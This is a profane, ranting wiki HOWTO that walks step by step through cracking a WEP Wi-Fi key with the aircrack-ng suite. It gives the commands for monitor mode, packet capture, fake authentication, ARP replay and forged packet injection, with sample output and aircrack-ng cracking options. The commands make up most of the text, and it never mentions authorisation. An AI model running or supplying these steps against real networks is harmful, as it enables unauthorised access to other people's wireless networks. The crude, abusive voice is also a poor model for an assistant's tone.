WEP Cracking HOWTO

by asbesto && lechuck

I wrote this HOWTO because I was sick and tired of all that online shit. Every fuckin'document that state to explain how to crack a fracking WEP, really don't explain a SINGLE FUCK, linking other manual pages, making unuseful and unexplained examples also linking other incomplete help pages. So you know what? FUCK YOU, if you wrote a piece of SHIT called HOWTO and you link help pages, well, that's not a HOWTO, THAT'S A FUCKING STEAMING PILE OF BLOODY SHIT.

Thanks to Lechuck, without him this work will not be ever possible :)

So, this is an HOWTO: if you follow this document STEP BY STEP, you OBTAIN RESULTS, NOW.

What to install

Obviously you need the aircrack suite, now called aircrack-ng only because the old aircrack is no more developed. WHAT - THE - FUCK. I don't get why in THE HELL the fucking developers have renamed it instead of GIVING AN ACTUAL FUCK and call the new project exactly as the old one!


sudo apt-get install aircrack-ng

Setup your newtork card

Assumint that your wifi card is wlan0, just use

airmon-ng start wlan0 1

so you have just activated the mon0 interface. Sometime you will get some warning messages about some daemons interfering and creating problems, shit like avahi, networkmanager, and other unuseful shit. KILL THEM ALL. You don't need to re-run airmon-ng.


Assuming the WEP AP to crack is called Diolink-22334455 with a MAC address (bssid) AP:AP:AP:AP:AP:AP

And my wlan0 address is: IO:IO:IO:IO:IO:IO

FIRST: let's dump some data

 airodump-ng -c 1 -b AP:AP:AP:AP:AP:AP -t wep -w output.cap mon0

SECOND: aireplay #1

Open another shell:

aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0

You will get something like

16:55:37  Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1

16:55:37  Sending Authentication Request (Open System)
16:55:37  Authentication successful
16:55:37  Sending Association Request
16:55:37  Association successful :-) (AID: 1)

FUCKING GOOD, it means you can autenticate. Now launch

aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0

U get something like

16:57:27  Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1
Saving ARP requests in replay_arp-0629-165727.cap
You should also start airodump-ng to capture replies.
Read 1427 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

Packet number begin to raise. 0 arp is BAD. so let's move on the third phase.

THIRD: another aireplay

Open a third shell, we can try to autenticate, while the 2 other shells are running:

aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0

If this create some ARP, well, that's GREAT! if this create only ACK, they're not useful so fuck them all. Again on the third shell, we can try

aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0

This is aireplay interactive mode: it forge packets to DO SHIT. In theory, you must say Y to the forged packet only if it's lenght is 68 or 86. He read the packets, reflect, does some magic and create.

68 = lenght of a wifi client ARP. 86 for wired.

BUT I DON'T GIVE A FUCK, he gave me a 76, and I SAY FUCK YES!

after a while, I try

aircrack-ng filename.dump

And here they are, 76000 IV !!!!! LET'S START THE CRACKING PARTY!

He's pumping behind! He see the file still increasing, when a "failed" come out, he simply restart...



aircrack-ng -K -M 4981430 -f 3 -b 00:25:53:1A:AB:B4 -s output.cap-01.cap 

-s show ascii. -K is useful, playing with f you can crack 100%.

with -f 4 I found the key. ;)

-b must be specified, if not, BAD SHIT HAPPENS.


aircrack-ng -K file.dump o file.ivs

-k is a cracking algorithm:

-k <korek>
There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.

This is an experimental single brute-force attack which should only be used when the standard attack mode fails with more than one million IVs.

Uses PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann) attack.

On some cases (AKA al**ce adsl :) you want to use -z (sometime you can't crack it with >1 millions IV - that's because default algo fails) 


WepCrackingHowto (last edited 2018-09-14 10:16:02 by asbesto)